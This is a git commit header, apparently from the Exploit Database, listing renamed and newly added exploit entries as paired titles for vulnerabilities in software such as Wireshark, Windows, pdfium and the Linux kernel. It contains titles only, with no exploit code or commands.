From a24ecf72c3e9f1f94e3b2c535d8ae5c057239cf6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 1 Dec 2017 10:57:46 +0000 Subject: [PATCH] DB: 2017-12-01 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 82 changes to exploits/shellcodes 32 new exploits/shellcodes Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Based Overrun (PoC) Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Overrun (PoC) CA BrightStor HSM r11.5 - Remote Stack Based Overflow / Denial of Service CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC) Rosoft Media Player 4.1.8 - RML Stack Buffer Overflow (PoC) Aircrack-NG Tools svn r1675 - Remote Heap-Based Buffer Overflow Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow FontForge - '.BDF' Font File Stack Based Buffer Overflow FontForge - '.BDF' Font File Stack Buffer Overflow Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC) Libmodplug 0.8.8.2 - '.abc' Stack Buffer Overflow (PoC) Citrix XenApp / XenDesktop - Stack Based Buffer Overflow Citrix XenApp / XenDesktop - Stack Buffer Overflow Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflows Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC) Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC) IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Overflow Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow Oracle Outside-In - '.LWP' File Parsing Stack Buffer Overflow mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC) mcrypt 2.6.8 - Stack Buffer Overflow (PoC) MySQL (Linux) - Stack Based Buffer Overrun (PoC) MySQL (Linux) - Heap Based Overrun (PoC) MySQL (Linux) - Stack Buffer Overrun (PoC) MySQL (Linux) - Heap Overrun (PoC) Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - 'DownloadURLToFile()' Unicode Stack Buffer Overflow Sony PC Companion 2.1 - 'Load()' Unicode Stack Buffer Overflow Sony PC Companion 2.1 - 'CheckCompatibility()' Unicode Stack Buffer Overflow Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Unicode Stack Buffer Overflow DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Based Buffer Overflow DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (1) GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Buffer Overrun (1) Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Based Buffer Overflow Denial of Service Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow Denial of Service Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow Multiple Vendor Telnet Client - Env_opt_add Heap Buffer Overflow SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Based Overflow SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Overflow Winamp 5.63 - Stack Based Buffer Overflow Winamp 5.63 - Stack Buffer Overflow Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow Apple Mac OSX 10.x - '.zip' 'BOMStackPop()' Overflow Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap-Based Buffer Overflow (MS14-056) Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow (MS14-056) MPlayer 1.0 - AVIHeader.C Heap Based Buffer Overflow MPlayer 1.0 - AVIHeader.C Heap Buffer Overflow ProWizard 4 PC 1.62 - Multiple Remote Stack Based Buffer Overflow Vulnerabilities WinUAE 1.4.4 - 'zfile.c' Stack Based Buffer Overflow ProWizard 4 PC 1.62 - Multiple Remote Stack Buffer Overflow Vulnerabilities WinUAE 1.4.4 - 'zfile.c' Stack Buffer Overflow Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow Google Android Web Browser - '.GIF' File Heap Buffer Overflow Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC) Oracle Outside In MDB - File Parsing Stack Buffer Overflow (PoC) NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow FFmpeg libavformat - 'psxstr.c' STR Data Heap Buffer Overflow OpenVms 8.3 Finger Service - Stack Based Buffer Overflow OpenVms 8.3 Finger Service - Stack Buffer Overflow Free Download Manager - Stack Based Buffer Overflow Free Download Manager - Stack Buffer Overflow Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow Sonique 2.0 - '.xpl' Remote Stack Buffer Overflow eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow eXPert PDF 7.0.880.0 - '.pj' Heap Buffer Overflow Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File Adobe Flash - Heap Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec Adobe Flash - Heap Buffer Overflow Due to Indexing Error When Loading FLV File Valhala Honeypot 1.8 - Stack Based Buffer Overflow Valhala Honeypot 1.8 - Stack Buffer Overflow Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow Microsoft Office 2007 - Malformed Document Stack Buffer Overflow Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow Xion Audio Player 1.5 build 155 - Stack Buffer Overflow Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Based Buffer Overflow Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow Last PassBroker 3.2.16 - Stack Based Buffer Overflow Last PassBroker 3.2.16 - Stack Buffer Overflow FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Out-of-Bounds Reads FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read FBZX 2.10 - Local Stack Based Buffer Overflow TACK 1.07 - Local Stack Based Buffer Overflow FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Out-of-Bounds Read FBZX 2.10 - Local Stack Buffer Overflow TACK 1.07 - Local Stack Buffer Overflow Gnome Nautilus 3.16 - Denial of Service Wireshark - iseries_parse_packet Heap Based Buffer Overflow Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow Wireshark - iseries_parse_packet Heap Buffer Overflow Wireshark - dissect_tds7_colmetadata_token Stack Buffer Overflow Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Buffer Overflow Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow Wireshark - find_signature Stack Based Out-of-Bounds Read Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow Wireshark - getRate Stack Based Out-of-Bounds Read Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Buffer Overflow Wireshark - find_signature Stack Out-of-Bounds Read Wireshark - AirPDcapPacketProcess Stack Buffer Overflow Wireshark - getRate Stack Out-of-Bounds Read Wireshark - 'infer_pkt_encap' Heap Based Out-of-Bounds Read Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (1) Wireshark - 'infer_pkt_encap' Heap Out-of-Bounds Read Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (1) pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Based Out-of-Bounds Read pdfium - CPDF_TextObject::CalcPositionData Heap Based Out-of-Bounds Read pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Out-of-Bounds Read pdfium - CPDF_TextObject::CalcPositionData Heap Out-of-Bounds Read pdfium - CPDF_Function::Call Stack Based Buffer Overflow pdfium - CPDF_Function::Call Stack Buffer Overflow pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Out-of-Bounds Read pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Out-of-Bounds Read Wireshark - 'iseries_check_file_type' Stack Out-of-Bounds Read Wireshark - dissect_nhdr_extopt Stack Buffer Overflow Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Based Out-of-Bounds Read Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Out-of-Bounds Read Wireshark - dissect_ber_constrained_bitstring Heap Out-of-Bounds Read glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC) glibc - 'getaddrinfo' Stack Buffer Overflow (PoC) Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow libxml2 - xmlDictAddString Heap Based Buffer Overread libxml2 - xmlParseEndTag2 Heap Based Buffer Overread libxml2 - xmlParserPrintFileContextInternal Heap Based Buffer Overread libxml2 - htmlCurrentChar Heap Based Buffer Overread Wireshark - vwr_read_s2_s3_W_rec Heap Buffer Overflow libxml2 - xmlDictAddString Heap Buffer Overread libxml2 - xmlParseEndTag2 Heap Buffer Overread libxml2 - xmlParserPrintFileContextInternal Heap Buffer Overread libxml2 - htmlCurrentChar Heap Buffer Overread Kamailio 4.3.4 - Heap Based Buffer Overflow Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read Kamailio 4.3.4 - Heap Buffer Overflow Wireshark - dissect_pktc_rekey Heap Out-of-Bounds Read Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow Wireshark - dissect_2008_16_security_4 Stack Buffer Overflow Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (2) Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (2) Microsoft Windows - 'gdi32.dll' Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055) Microsoft Windows - 'gdi32.dll' Heap Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055) Graphite2 - GlyphCache::GlyphCache Heap Based Buffer Overflow Graphite2 - GlyphCache::Loader Heap Based Overreads Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Based Overread Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Based Overread Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads Graphite2 - GlyphCache::GlyphCache Heap Buffer Overflow Graphite2 - GlyphCache::Loader Heap Overreads Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Overread Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Overread Graphite2 - NameTable::getName Multiple Heap Out-of-Bounds Reads Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Memory Corruption Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074) Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Out-of-Bounds Reads/Memory Disclosure (MS16-074) Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097) Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Buffer Overflow (MS16-097) Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap Out-of-Bounds Reads / Memory Disclosure Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow Microsoft Windows - 'LoadUvsTable()' Heap Buffer Overflow Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!MergeLigRecords' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption Around 'USP10!BuildFSM' (MS17-011) Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap Buffer Overflow (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption in 'USP10!MergeLigRecords' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011) Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption Around 'USP10!BuildFSM' (MS17-011) Microsoft Windows - Uniscribe Font Processing Multiple Heap-Based Out-of-Bounds and Wild Reads (MS17-011) Microsoft Windows - Uniscribe Font Processing Multiple Heap Out-of-Bounds and Wild Reads (MS17-011) Microsoft Windows - Uniscribe Heap-Based Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013) Microsoft Windows - Uniscribe Heap Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013) SAP SAPCAR 721.510 - Heap-Based Buffer Overflow SAP SAPCAR 721.510 - Heap Buffer Overflow Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap-Based Memory Corruption Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap Memory Corruption LAME 3.99.5 - 'III_dequantize_sample' Stack Based Buffer Overflow LAME 3.99.5 - 'III_dequantize_sample' Stack Buffer Overflow OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow OpenJPEG - 'mqc.c' Heap Buffer Overflow tcprewrite - Heap-Based Buffer Overflow tcprewrite - Heap Buffer Overflow Dnsmasq < 2.78 - 2-byte Heap-Based Overflow Dnsmasq < 2.78 - Heap-Based Overflow Dnsmasq < 2.78 - Stack-Based Overflow Dnsmasq < 2.78 - 2-byte Heap Overflow Dnsmasq < 2.78 - Heap Overflow Dnsmasq < 2.78 - Stack Overflow binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow binutils 2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow PHP 7.1.8 - Heap-Based Buffer Overflow PHP 7.1.8 - Heap Buffer Overflow QEMU - NBD Server Long Export Name Stack Buffer Overflow Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page TerminatorX 3.81 - Local Stack Overflow / Privilege Escalation TerminatorX 3.81 - Local Stack Overflow / Local Privilege Escalation BSDi 3.0 inc - Local Buffer Overflow / Privilege Escalation BSDi 3.0 inc - Local Buffer Overflow / Local Privilege Escalation RedHat 6.1 - 'man' Local Overflow / Privilege Escalation RedHat 6.1 - 'man' Local Overflow / Local Privilege Escalation IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation AIX lquerylv - Local Buffer Overflow / Privilege Escalation AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Privilege Escalation IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Local Privilege Escalation libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC) libxml 2.6.12 nanoftp - Buffer Overflow (PoC) Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Privilege Escalation Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation Gopher 3.0.9 - '+VIEWS' Remote Client-Side Buffer Overflow Gopher 3.0.9 - '+VIEWS' Client-Side Buffer Overflow XMail 1.21 - '-t' Command Line Option Buffer Overflow / Privilege Escalation XMail 1.21 - '-t' Command Line Option Local Buffer Overflow / Local Privilege Escalation Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation Microsoft Excel - Remote Code Execution Microsoft Excel - Code Execution HP-UX 11i - 'swpackage' Local Stack Overflow / Privilege Escalation HP-UX 11i - 'swmodify' Local Stack Overflow / Privilege Escalation HP-UX 11i - 'swpackage' Local Stack Overflow / Local Privilege Escalation HP-UX 11i - 'swmodify' Local Stack Overflow / Local Privilege Escalation Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow / Local Privilege Escalation News Rover 12.1 Rev 1 - Remote Stack Overflow (1) News Rover 12.1 Rev 1 - Stack Overflow (1) News Rover 12.1 Rev 1 - Remote Stack Overflow (2) News Rover 12.1 Rev 1 - Stack Overflow (2) FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Privilege Escalation FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow Apple Mac OSX - 'mount_smbfs' Local Stack Buffer Overflow VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit) Free Download Manager - '.Torrent' File Parsing Multiple Buffer Overflow Vulnerabilities (Metasploit) MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Buffer Overflows Libmodplug - 's3m' Remote Buffer Overflow Libmodplug - 's3m' Buffer Overflow Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin) Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Code Execution (Add Admin) EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Remote Buffer Overflow (PoC) EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow (PoC) Microsoft Visio 2002 - '.DXF' File Stack based Overflow Microsoft Visio 2002 - '.DXF' Local Stack Overflow AOL 9.5 - 'Phobos.Playlist Import()' Stack Based Buffer Overflow (Metasploit) AOL 9.5 - 'Phobos.Playlist Import()' Stack Buffer Overflow (Metasploit) CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (SEH) (Metasploit) CCMPlayer 1.5 - '.m3u' Stack Buffer Overflow (SEH) (Metasploit) CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (Metasploit) CCMPlayer 1.5 - '.m3u' Stack Buffer Overflow (Metasploit) Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit) Foxit Reader 3.0 - Open Execute Action Stack Buffer Overflow (Metasploit) Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Local Privilege Escalation BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1) BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Local Privilege Escalation (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (3) S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Local Privilege Escalation Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Local Privilege Escalation Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation Solaris 7.0 - 'kcms_configure' Local Overflow / Local Privilege Escalation Internet Download Manager - Stack Based Buffer Overflow Internet Download Manager - Local Stack Buffer Overflow AFD 1.2.x - Working Directory Local Buffer Overflow / Privilege Escalation AFD 1.2.x - Working Directory Local Buffer Overflow / Local Privilege Escalation mcrypt 2.5.8 - Stack Based Overflow mcrypt 2.5.8 - Local Stack Overflow Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow / Privilege Escalation (MS04-020) Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020) Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation (1) Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1) Winamp 5.12 - '.m3u' Stack Based Buffer Overflow Winamp 5.12 - '.m3u' Local Stack Buffer Overflow RealNetworks RealOne Player/RealPlayer - '.RM' Local Stack Buffer Overflow KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite KingView 6.53 - 'KChartXY' ActiveX File Creation / Overwrite BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow Super Player 3500 - '.m3u' Local Stack Based Buffer Overflow Super Player 3500 - '.m3u' Local Stack Buffer Overflow IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow IBM AIX 5.2/5.3 - Capture Command Local Stack Buffer Overflow MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color() GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color() GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Buffer Overflow MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Privilege Escalation Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Local Privilege Escalation BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Privilege Escalation Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Local Privilege Escalation BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RET Buffer Overflow BlazeDVD Pro Player 7.0 - '.plf' Direct RET Local Stack Buffer Overflow BlueVoda Website Builder 11 - '.bvp' Local Stack Buffer Overflow Sim Editor 6.6 - Stack Based Buffer Overflow Sim Editor 6.6 - Local Stack Buffer Overflow Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022) Microsoft Word - Local Machine Zone Code Execution (MS15-022) Symantec Encryption Desktop 10 - Local Buffer Overflow / Privilege Escalation Symantec Encryption Desktop 10 - Local Buffer Overflow / Local Privilege Escalation AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow AdobeWorkgroupHelper 2.8.3.3 - Local Stack Buffer Overflow EasyCafe Server 2.2.14 - Remote File Read Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (1) Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (2) Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1) Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2) Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042) Microsoft Excel - Out-of-Bounds Read Code Execution (MS16-042) TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow TRN Threaded USENET News Reader 3.6-23 - Local Stack Overflow NRSS Reader 0.3.9 - Local Stack Based Overflow NRSS Reader 0.3.9 - Local Stack Overflow Linux - ecryptfs and /proc/$pid/environ Privilege Escalation Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099) Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099) NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Stack Buffer Overflow Callback / Privilege Escalation NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Local Stack Buffer Overflow Callback / Local Privilege Escalation Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout) Microsoft Remote Desktop Client for Mac 8.0.36 - Remote Code Execution Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution Man-db 2.6.7.1 - Local Privilege Escalation (PoC) Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit) Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Code Execution (Metasploit) Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit) Nitro Pro PDF Reader 11.0.3.173 - Javascript API Code Execution (Metasploit) PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution PDF-XChange Viewer 2.5 Build 314.0 - Code Execution Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (1) Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1) Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (2) Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2) UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation 